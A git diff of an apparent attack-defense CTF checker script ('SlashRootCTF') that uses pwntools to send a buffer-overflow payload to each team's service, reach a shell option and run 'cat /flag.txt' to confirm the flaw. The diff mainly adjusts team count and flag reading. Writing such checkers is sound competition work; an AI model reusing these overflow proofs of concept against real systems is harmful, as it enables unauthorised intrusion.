diff --git a/checker.py b/checker.py index 25fe214..2ffd3f3 100644 --- a/checker.py +++ b/checker.py @@ -2,7 +2,7 @@ from pwn import process, remote HOST = "192.168.2.20" -TOTAL_TEAMS = 10 +TOTAL_TEAMS = 1 FORMAT = "SlashRootCTF" @@ -15,7 +15,9 @@ def poc0(host, port): p = remote(host, port) p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - if "young" in p.recvuntil(">"): + msg = p.recvuntil(">") + # print(msg) + if "young" in msg: p.sendline("y") p.recvuntil(">") p.sendline("2") @@ -27,7 +29,8 @@ def poc0(host, port): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recv(46) + flag = p.recvuntil("}") + # print flag if FORMAT in flag: return True else: @@ -60,7 +63,7 @@ def poc1(host, port): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recv(46) + flag = p.recvuntil("}") if FORMAT in flag: return True else: @@ -85,7 +88,7 @@ def poc2(host, port): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recv(46) + flag = p.recvuntil("}") if FORMAT in flag: return True else: @@ -95,7 +98,7 @@ def poc2(host, port): if __name__ == "__main__": - for i in range(1): + for i in range(1, TOTAL_TEAMS+1): print poc0(HOST, (60004 + (i*100))) print poc1(HOST, (60004 + (i*100))) print poc2(HOST, (60004 + (i*100)))